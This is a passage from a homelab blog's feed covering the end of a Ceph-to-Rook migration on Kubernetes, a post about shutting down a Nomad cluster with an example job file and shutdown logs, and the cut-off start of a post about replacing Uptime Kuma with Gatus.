<pre tabindex="0"><code>2025-03-15 19:20:15.090341 W | op-osd: not updating OSD 0 on node &#34;oldhost&#34;. node no longer exists in the storage spec. if the user wishes to remove OSDs from the node, they must do so manually. Rook will not remove OSDs from nodes that are removed from the storage spec in order to prevent accidental data loss
</code></pre><p>After that slightly embarrassing failure, I deigned to actually skim the doc I
linked to above, and found this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>$ kubectl rook-ceph rook purge-osd 0,1 --force
</span></span><span style="display:flex;"><span>Info: Running purge osd command
</span></span><span style="display:flex;"><span>2025/03/15 19:48:59 maxprocs: Leaving GOMAXPROCS<span style="color:#f92672">=</span>8: CPU quota undefined
</span></span><span style="display:flex;"><span>2025-03-15 19:48:59.731856 W | cephcmd: loaded admin secret from env var ROOK_CEPH_SECRET instead of from file
</span></span><span style="display:flex;"><span>2025-03-15 19:48:59.731894 I | rookcmd: starting Rook v1.16.5 with arguments <span style="color:#e6db74">&#39;rook ceph osd remove --osd-ids=0,1 --force-osd-removal=true&#39;</span>
</span></span><span style="display:flex;"><span>2025-03-15 19:48:59.731897 I | rookcmd: flag values: --force-osd-removal<span style="color:#f92672">=</span>true, --help<span style="color:#f92672">=</span>false, --log-level<span style="color:#f92672">=</span>INFO, --osd-ids<span style="color:#f92672">=</span>0,1, --preserve-pvc<span style="color:#f92672">=</span>false
</span></span><span style="display:flex;"><span>2025-03-15 19:48:59.737462 I | cephclient: writing config file /var/lib/rook/rook-ceph/rook-ceph.config
</span></span><span style="display:flex;"><span>2025-03-15 19:48:59.737529 I | cephclient: generated admin config in /var/lib/rook/rook-ceph
</span></span><span style="display:flex;"><span>2025-03-15 19:48:59.921560 I | cephosd: validating status of osd.0
</span></span><span style="display:flex;"><span>2025-03-15 19:48:59.921571 I | cephosd: osd.0 is healthy. It cannot be removed unless it is <span style="color:#e6db74">&#39;down&#39;</span>
</span></span><span style="display:flex;"><span>2025-03-15 19:48:59.921573 I | cephosd: validating status of osd.1
</span></span><span style="display:flex;"><span>2025-03-15 19:48:59.921575 I | cephosd: osd.1 is healthy. It cannot be removed unless it is <span style="color:#e6db74">&#39;down&#39;</span>
</span></span></code></pre></div><p>So that wasn&rsquo;t exactly a success either. So what did I do? Did I now properly
read the entire page? No, of course not.
I instead decided that the right way to do this was to scale down the two OSDs
I wanted to remove:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n rook-cluster scale deployment rook-ceph-osd-0 --replicas<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>kubectl -n rook-cluster scale deployment rook-ceph-osd-1 --replicas<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span></code></pre></div><p>And then I repeated the previous command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>$ kubectl rook-ceph rook purge-osd 0,1 --force
</span></span><span style="display:flex;"><span>Info: Running purge osd command
</span></span><span style="display:flex;"><span>2025/03/15 19:50:33 maxprocs: Leaving GOMAXPROCS<span style="color:#f92672">=</span>8: CPU quota undefined
</span></span><span style="display:flex;"><span>2025-03-15 19:50:33.244662 W | cephcmd: loaded admin secret from env var ROOK_CEPH_SECRET instead of from file
</span></span><span style="display:flex;"><span>2025-03-15 19:50:33.244700 I | rookcmd: starting Rook v1.16.5 with arguments <span style="color:#e6db74">&#39;rook ceph osd remove --osd-ids=0,1 --force-osd-removal=true&#39;</span>
</span></span><span style="display:flex;"><span>2025-03-15 19:50:33.244704 I | rookcmd: flag values: --force-osd-removal<span style="color:#f92672">=</span>true, --help<span style="color:#f92672">=</span>false, --log-level<span style="color:#f92672">=</span>INFO, --osd-ids<span style="color:#f92672">=</span>0,1, --preserve-pvc<span style="color:#f92672">=</span>false
</span></span><span style="display:flex;"><span>2025-03-15 19:50:33.250479 I | cephclient: writing config file /var/lib/rook/rook-ceph/rook-ceph.config
</span></span><span style="display:flex;"><span>2025-03-15 19:50:33.250539 I | cephclient: generated admin config in /var/lib/rook/rook-ceph
</span></span><span style="display:flex;"><span>2025-03-15 19:50:33.432040 I | cephosd: validating status of osd.0
</span></span><span style="display:flex;"><span>2025-03-15 19:50:33.432049 I | cephosd: osd.0 is marked <span style="color:#e6db74">&#39;DOWN&#39;</span>
</span></span><span style="display:flex;"><span>2025-03-15 19:50:33.622957 I | cephosd: marking osd.0 out
</span></span><span style="display:flex;"><span>2025-03-15 19:50:34.825971 I | cephosd: osd.0 is NOT ok to destroy but force removal is enabled so proceeding with removal
</span></span><span style="display:flex;"><span>2025-03-15 19:50:34.828262 E | cephosd: failed to fetch the deployment <span style="color:#e6db74">&#34;rook-ceph-osd-0&#34;</span>. deployments.apps <span style="color:#e6db74">&#34;rook-ceph-osd-0&#34;</span> not found
</span></span><span style="display:flex;"><span>2025-03-15 19:50:34.828271 I | cephosd: purging osd.0
</span></span><span style="display:flex;"><span>2025-03-15 19:50:35.055813 I | cephosd: attempting to remove host <span style="color:#e6db74">&#34;oldhost&#34;</span> from crush map <span style="color:#66d9ef">if</span> not in use
</span></span><span style="display:flex;"><span>2025-03-15 19:50:35.237143 I | cephosd: failed to remove CRUSH host <span style="color:#e6db74">&#34;oldhost&#34;</span>. exit status <span style="color:#ae81ff">39</span>
</span></span><span style="display:flex;"><span>2025-03-15 19:50:35.427664 I | cephosd: no ceph crash to silence
</span></span><span style="display:flex;"><span>2025-03-15 19:50:35.427677 I | cephosd: completed removal of OSD <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>2025-03-15 19:50:35.427680 I | cephosd: validating status of osd.1
</span></span><span style="display:flex;"><span>2025-03-15 19:50:35.427683 I | cephosd: osd.1 is marked <span style="color:#e6db74">&#39;DOWN&#39;</span>
</span></span><span style="display:flex;"><span>2025-03-15 19:50:35.608670 I | cephosd: marking osd.1 out
</span></span><span style="display:flex;"><span>2025-03-15 19:50:36.329162 I | cephosd: osd.1 is NOT ok to destroy but force removal is enabled so proceeding with removal
</span></span><span style="display:flex;"><span>2025-03-15 19:50:36.331913 E | cephosd: failed to fetch the deployment <span style="color:#e6db74">&#34;rook-ceph-osd-1&#34;</span>. deployments.apps <span style="color:#e6db74">&#34;rook-ceph-osd-1&#34;</span> not found
</span></span><span style="display:flex;"><span>2025-03-15 19:50:36.331920 I | cephosd: purging osd.1
</span></span><span style="display:flex;"><span>2025-03-15 19:50:36.655373 I | cephosd: attempting to remove host <span style="color:#e6db74">&#34;oldhost&#34;</span> from crush map <span style="color:#66d9ef">if</span> not in use
</span></span><span style="display:flex;"><span>2025-03-15 19:50:37.663211 I | cephosd: removed CRUSH host <span style="color:#e6db74">&#34;oldhost&#34;</span>
</span></span><span style="display:flex;"><span>2025-03-15 19:50:37.930419 I | cephosd: no ceph crash to silence
</span></span><span style="display:flex;"><span>2025-03-15 19:50:37.930431 I | cephosd: completed removal of OSD <span style="color:#ae81ff">1</span>
</span></span></code></pre></div><p>Note especially those lines:</p>
<pre tabindex="0"><code>2025-03-15 19:50:34.825971 I | cephosd: osd.0 is NOT ok to destroy but force removal is enabled so proceeding with removal
2025-03-15 19:50:36.329162 I | cephosd: osd.1 is NOT ok to destroy but force removal is enabled so proceeding with removal
</code></pre><p>That&rsquo;s where my arrogance really bit me. I had just copy+pasted the <code>rook purge-osd</code>
command from the docs, including the <code>--force</code> at the end. Not a good idea.
Instead of taking the OSD out and then letting the cluster rebalance, the OSD was
just removed, meaning I had a relatively long phase of reduced data redundancy.</p>
<p>Not my most stellar Homelab moment.</p>
<p>It took another 17 hours of rebalancing to recover the cluster. But I still wasn&rsquo;t
done yet, because now the Rook operator logs were showing these messages:</p>
<pre tabindex="0"><code>2025-03-20 20:31:32.598410 I | clusterdisruption-controller: osd &#34;rook-ceph-osd-0&#34; is down and a possible node drain is detected
2025-03-20 20:31:32.598473 I | clusterdisruption-controller: osd &#34;rook-ceph-osd-1&#34; is down and a possible node drain is detected
2025-03-20 20:31:32.814825 I | clusterdisruption-controller: osd is down in failure domain &#34;oldhost&#34;. pg health: &#34;all PGs in cluster are clean&#34;
</code></pre><p>And again, had I read the docs properly, this would not have happened. I fixed
the issue with the following commands:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n rook-ceph scale deployment rook-ceph-operator --replicas<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>kubectl delete deployments.apps -n rook-cluster rook-ceph-osd-0
</span></span><span style="display:flex;"><span>kubectl delete deployments.apps -n rook-cluster rook-ceph-osd-1
</span></span><span style="display:flex;"><span>kubectl -n rook-ceph scale deployment rook-ceph-operator --replicas<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span>
</span></span></code></pre></div><p>With that I finally had removed the old host cleanly from the Rook cluster. It
could all have been a lot smoother if I&rsquo;d just read the docs properly the first
time. Again, no data loss of course, but it could have gone better.</p>
<p>The last step in the Ceph baremetal to Rook saga was to remove the old host from
the Kubernetes cluster entirely:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl drain oldhost --ignore-daemonsets --delete-local-data
</span></span><span style="display:flex;"><span>kubectl delete node oldhost
</span></span></code></pre></div><p>And then resetting the Ceph scheduler options:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl rook-ceph ceph config rm osd osd_mclock_profile
</span></span><span style="display:flex;"><span>kubectl rook-ceph ceph config rm osd osd_mclock_override_recovery_settings
</span></span></code></pre></div><h2 id="conclusion">Conclusion</h2>
<p>And that was it. The entire migration from baremetal Ceph took me quite a while,
but a lot of it was just waiting for copying and rebalancing operations to finish.
The effort I had to put in was relatively low. Even considering that somewhere
towards the end I temporarily forgot the value of reading documentation from
beginning to end.</p>
<p>The fact that I think I did not make use of my full storage performance especially
during the addition/removal of hosts has reinforced my wish to do a real deep
dive into Ceph, how it&rsquo;s implemented and how it works. Luckily, it&rsquo;s written in
C++, which I&rsquo;m working with for work as well. But I&rsquo;m hoping I can also find
some more high-level explanations of the algorithms used. I even plan to read
Weil&rsquo;s original thesis and papers on RADOS and the CRUSH algorithm.</p>
<p>While writing these lines, I&rsquo;m also working on the last step of the migration,
migrating Vault into the cluster and then migrating the cluster control plane
nodes from VMs to my three Pi 4.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 22: The end of Nomad</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-22-end-of-nomad/</link>
      <pubDate>Sun, 23 Mar 2025 23:10:32 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-22-end-of-nomad/</guid>
      <description>The end of a Workload Scheduler era</description>
      <content:encoded><![CDATA[<p>Wherein I shut down my Nomad cluster for good.</p>
<p>This is part 23 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>It is finally done, on the 13th of March I shut down my <a href="https://www.nomadproject.io/">Nomad</a> cluster. I had
originally set it up sometime around 2021. The original trigger was that I had
started to separate the Docker containers running public-facing services and the
purely internal ones. Around that setup, I had constructed a bunch of bash
scripts and a couple of shared mounts. It wasn&rsquo;t pretty, plus the Homelab had
recently turned from a utility into a genuine hobby. In short, increased complexity
was actually welcomed. &#x1f601;</p>
<p>So when I started reading about workload schedulers, I naturally first looked at Kubernetes.
I bounced off of that when I came to the &ldquo;Now chose a Container Networking Plugin&rdquo;
stage of the install instructions. And I didn&rsquo;t just not know which CNI plugin
to choose - no, I didn&rsquo;t even know <em>how to make said choice</em>.</p>
<p>And that&rsquo;s how I came across Nomad. Together with <a href="https://www.consul.io/">Consul</a>
and <a href="https://www.vaultproject.io/">Vault</a> I had a really enjoyable Homelab. Nomad,
as well as Consul and Vault, are absolutely excellent tools. Nomad has some really
great flexibility when it comes to the drivers it can use for its jobs. They
range from Docker to pure exec jobs run in a simple chroot. Networking can be
done as simple or complex as you like, and by default you don&rsquo;t need to worry
about any kind of separate network. If you like, you can run it all on the
network between your nodes without any complicated CNIs.</p>
<p>And that&rsquo;s what initially drew me to Nomad. Taken on its own, it doesn&rsquo;t do much more
than running workloads, and that&rsquo;s it. For secrets management or service discovery
you can then add Vault and Consul, or you can just leave those things out.</p>
<p>Since I started with Nomad, some service discovery and secrets management
capabilities have been added to Nomad itself, but I never tried them because I&rsquo;ve had Vault and
Consul already set up to my liking.</p>
<p>So let&rsquo;s have a short look at an example job:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">job</span> <span style="color:#e6db74">&#34;prometheus&#34;</span> {
</span></span><span style="display:flex;"><span>  datacenters <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;homenet&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">constraint</span> {
</span></span><span style="display:flex;"><span>    attribute <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${node.class}&#34;</span>
</span></span><span style="display:flex;"><span>    value     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;internal&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">group</span> <span style="color:#e6db74">&#34;prometheus&#34;</span> {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">network</span> {
</span></span><span style="display:flex;"><span>      mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridge&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">port</span> <span style="color:#e6db74">&#34;health&#34;</span> {
</span></span><span style="display:flex;"><span>        host_network <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local&#34;</span>
</span></span><span style="display:flex;"><span>        to           <span style="color:#f92672">=</span> <span style="color:#ae81ff">9090</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">service</span> {
</span></span><span style="display:flex;"><span>      name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;prometheus&#34;</span>
</span></span><span style="display:flex;"><span>      port <span style="color:#f92672">=</span> <span style="color:#ae81ff">9090</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">connect</span> {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">sidecar_service</span> {
</span></span><span style="display:flex;"><span>          <span style="color:#66d9ef">proxy</span> {
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">upstreams</span> {
</span></span><span style="display:flex;"><span>              destination_name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;snmp-exporter&#34;</span>
</span></span><span style="display:flex;"><span>              local_bind_port <span style="color:#f92672">=</span> <span style="color:#ae81ff">9116</span>
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>          }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">check</span> {
</span></span><span style="display:flex;"><span>        type     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;http&#34;</span>
</span></span><span style="display:flex;"><span>        interval <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;30s&#34;</span>
</span></span><span style="display:flex;"><span>        path     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/-/ready&#34;</span>
</span></span><span style="display:flex;"><span>        timeout  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2s&#34;</span>
</span></span><span style="display:flex;"><span>        port     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;health&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">volume</span> <span style="color:#e6db74">&#34;vol-prometheus&#34;</span> {
</span></span><span style="display:flex;"><span>      type            <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;csi&#34;</span>
</span></span><span style="display:flex;"><span>      source          <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vol-prometheus&#34;</span>
</span></span><span style="display:flex;"><span>      attachment_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;file-system&#34;</span>
</span></span><span style="display:flex;"><span>      access_mode     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;single-node-writer&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">task</span> <span style="color:#e6db74">&#34;prometheus&#34;</span> {
</span></span><span style="display:flex;"><span>      driver <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;docker&#34;</span>
</span></span><span style="display:flex;"><span>      user <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;962:962&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">config</span> {
</span></span><span style="display:flex;"><span>        image <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;prom/prometheus:v2.50.0&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">mount</span> {
</span></span><span style="display:flex;"><span>          type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bind&#34;</span>
</span></span><span style="display:flex;"><span>          source <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;secrets/prometheus.yml&#34;</span>
</span></span><span style="display:flex;"><span>          target <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/etc/prometheus/prometheus.yml&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        args <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>          &#34;--config.file<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">etc</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">prometheus</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">prometheus</span>.<span style="color:#66d9ef">yml</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>          &#34;--storage.tsdb.path<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">prometheus</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>          &#34;--web.console.libraries<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">share</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">prometheus</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">console_libraries</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>          &#34;--web.console.templates<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">share</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">prometheus</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">consoles</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>          &#34;--web.page-title<span style="color:#f92672">=</span><span style="color:#66d9ef">Homenet</span> <span style="color:#66d9ef">Prometheus</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>          &#34;--storage.tsdb.retention.time<span style="color:#f92672">=</span><span style="color:#ae81ff">5</span><span style="color:#960050;background-color:#1e0010">y&#34;</span>,
</span></span><span style="display:flex;"><span>          &#34;--log.format<span style="color:#f92672">=</span><span style="color:#66d9ef">json</span><span style="color:#960050;background-color:#1e0010">&#34;</span>
</span></span><span style="display:flex;"><span>        ]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">vault</span> {
</span></span><span style="display:flex;"><span>        policies <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;prometheus&#34;</span>]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">volume_mount</span> {
</span></span><span style="display:flex;"><span>        volume      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vol-prometheus&#34;</span>
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/prometheus&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">template</span> {
</span></span><span style="display:flex;"><span>        data <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#e6db74">&#34;prometheus/templates/prometheus.yml.templ&#34;</span>)
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;./secrets/prometheus.yml&#34;</span>
</span></span><span style="display:flex;"><span>        change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">resources</span> {
</span></span><span style="display:flex;"><span>        cpu <span style="color:#f92672">=</span> <span style="color:#ae81ff">400</span>
</span></span><span style="display:flex;"><span>        memory <span style="color:#f92672">=</span> <span style="color:#ae81ff">400</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This shows a pretty typical Nomad job setup in my Homelab. One of the interesting
things compared to Kubernetes is that most configuration is located in a single
file instead of a bunch of Yaml files. Very roughly speaking, the <code>group</code> is
an equivalent to Kubernetes Pods, in that it provides a common networking and
filesystem/volume namespace, and all <code>tasks</code> in a group get scheduled on
the same node.</p>
<p>The great integrations of Vault and Consul are both visible
here. First, there&rsquo;s the service, which hooks Prometheus into Consul&rsquo;s Connect
Mesh for service discovery. How that looks from a consumer service can be seen
in the <code>connect</code> stanza, which sets an upstream for an SNMP exporter running in
a separate job. Then there&rsquo;s the <code>vault</code> stanza, which configures a policy that
any Vault secrets access can use. These policies can then be tuned to allow only
access to the secrets the specific job actually needs.</p>
<p>Also something I learned to appreciate was the <code>template</code> stanza. It internally
uses <a href="https://github.com/hashicorp/consul-template">consul-template</a> to template
configuration files, complete with Vault integration. This made running apps
which expect their secrets in their configuration files a lot more convenient.</p>
<p>But I don&rsquo;t want to go into too much detail here. I&rsquo;m planning to write a
series of Homelab history posts where I will go into a lot more detail on the
setup and dredge up all manner of old configurations and notes.</p>
<p>In the end, the trigger for my decision to migrate my well-functioning Homelab
to k8s was HashiCorp&rsquo;s decision to relicense under a more restrictive license.
But I could have survived that one as well. And then they went and changed the
ToS for the Terraform provider registry to exclude the FOSS fork of Terraform.
That looked very much like pure spite to me, and I no longer trusted HashiCorp
enough to build my Homelab on their tools. More details can be found in
<a href="https://blog.mei-home.net/posts/hashipocalypse/">this post</a>.</p>
<p>So even though I liked (and still like) the tools, I&rsquo;ve now moved away from them
for the most part. Here is a screenshot of the cluster when it was in full swing:</p>
<figure>
    <img loading="lazy" src="nomad-full.png"
         alt="A screenshot of Nomads topology Web UI. It shows that the cluster had 9 clients, running 56 allocations. It had 68.66 GiB of RAM, of which 41% was reserved by jobs. The cluster also had 58.24 GHz of compute, of which 59% was used. To the right, a list shows the nine hosts, running anywhere between 2 and 10 allocations. Most of the hosts are Raspberry Pi CM4, with 8 GiB of RAM and 6000 MHz of compute."/> <figcaption>
            <p>The Nomad cluster when it was in full use.</p>
        </figcaption>
</figure>

<p>And then, on March 13th, it looked like this:</p>
<figure>
    <img loading="lazy" src="empty-nomad.png"
         alt="A screenshot of Nomads topology Web UI. It shows the same cluster, but now with only five instead of nine clients. The list of allocations assigned to hosts now only shows &#39;Empty client&#39; for the remaining clients."/> <figcaption>
            <p>The Nomad cluster right before shutdown.</p>
        </figcaption>
</figure>

<p>At that point, a couple of hosts were already migrated over to the k8s cluster.</p>
<p>It all ended with this:</p>
<pre tabindex="0"><code>Mar 13 20:42:52 nomad[657]: ==&gt; Caught signal: interrupt
Mar 13 20:42:52 nomad[657]:     2025-03-13T20:42:52.837+0100 [INFO]  agent: requesting shutdown
Mar 13 20:42:52 nomad[657]:     2025-03-13T20:42:52.837+0100 [INFO]  nomad: shutting down server
Mar 13 20:42:52 systemd[1]: Stopping Nomad...
Mar 13 20:42:52 nomad[657]:     2025-03-13T20:42:52.837+0100 [WARN]  nomad: serf: Shutdown without a Leave
Mar 13 20:42:52 nomad[657]:     2025-03-13T20:42:52.861+0100 [ERROR] consul.sync: failed deregistering agent service: service_id=_nomad-server-znuisv3m75ywtkofhwsukx47zklaefe3 error=&#34;Unexpected response code: 403 (Permission denied: token with AccessorID &#39;eaab766d-7627-3cda-21fe-a3d5fb63dd7a&#39; lacks permission &#39;service:write&#39; on \&#34;nomad\&#34;)&#34;
Mar 13 20:42:52 nomad[657]:     2025-03-13T20:42:52.863+0100 [ERROR] consul.sync: failed deregistering agent service: service_id=_nomad-server-fi2peeufsfjc6po3r6v3vrhwg2pcyymo error=&#34;Unexpected response code: 403 (Permission denied: token with AccessorID &#39;eaab766d-7627-3cda-21fe-a3d5fb63dd7a&#39; lacks permission &#39;service:write&#39; on \&#34;nomad\&#34;)&#34;
Mar 13 20:42:52 nomad[657]:     2025-03-13T20:42:52.866+0100 [ERROR] consul.sync: failed deregistering agent service: service_id=_nomad-server-ppg65djoq2gktz3gnzojkqza4d4idkv4 error=&#34;Unexpected response code: 403 (Permission denied: token with AccessorID &#39;eaab766d-7627-3cda-21fe-a3d5fb63dd7a&#39; lacks permission &#39;service:write&#39; on \&#34;nomad\&#34;)&#34;
Mar 13 20:42:52 nomad[657]:     2025-03-13T20:42:52.869+0100 [INFO]  agent: shutdown complete
Mar 13 20:42:52 systemd[1]: nomad.service: Main process exited, code=exited, status=1/FAILURE
Mar 13 20:42:52 systemd[1]: nomad.service: Failed with result &#39;exit-code&#39;.
Mar 13 20:42:52 systemd[1]: Stopped Nomad.
Mar 13 20:42:52 systemd[1]: nomad.service: Consumed 16h 25min 36.860s CPU time.
</code></pre><p>And with that it&rsquo;s gone. &#x1f641;</p>
<p>You will note the errors complaining about Consul. I completely forgot about
the service registrations before removing the Consul tokens allowing Nomad to
handle its own services. This was fixable by removing the Nomad service manually:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>consul services deregister -id<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;_nomad-server-zytfvzuzuboej3ehgwdihrgykyfj46pp
</span></span></span></code></pre></div><p>This command needs to be run against the Consul agent where the service was
registered, it can&rsquo;t be executed against just any Consul agent.</p>
<p>And with that, Nomad is gone. There&rsquo;s still a lot to do. I&rsquo;m already done shutting
down my Ceph cluster as well, that will likely be the next post.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 21: Replacing Uptime Kuma with Gatus</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-21-gatus/</link>
      <pubDate>Wed, 12 Mar 2025 22:40:24 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-21-gatus/</guid>
      <description>Replacing Uptime Kuma on Nomad with Gatus on k8s</description>
      <content:encoded><![CDATA[<p>Wherein I replace Uptime Kuma on Nomad with Gatus on Kubernetes.</p>
<p>This is part 22 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>For my service monitoring needs, I&rsquo;ve been using <a href="https://github.com/louislam/uptime-kuma">Uptime Kuma</a>
for a couple of years now. Please have a look at the repo&rsquo;s Readme for a couple
of screenshots, I completely forgot to make some before taking my instance down. &#x1f926;
My main use for it was as a platform to monitor the
services, not so much as a dashboard. To that end, I gathered Uptime Kuma&rsquo;s data
from the integrated Prometheus exporter and displayed it on my Grafana Homelab
dashboard.</p>
<p>I had two methods for monitoring services. The main one was checking their
domains via <a href="https://developer.hashicorp.com/consul/docs/services/discovery/dns-overview">Consul&rsquo;s DNS</a>.
Because all my service&rsquo;s health checks in the Nomad/Consul setup were done by
Consul anyway, this was a pretty nice method. When a service failed its health
check, Consul would remove it from its DNS and the Uptime Kuma check would start
failing.</p>
<p>But this approach wasn&rsquo;t really enough - for example, Mastodon&rsquo;s service might
very well be up and healthy, but I might have screwed up the Traefik configuration,
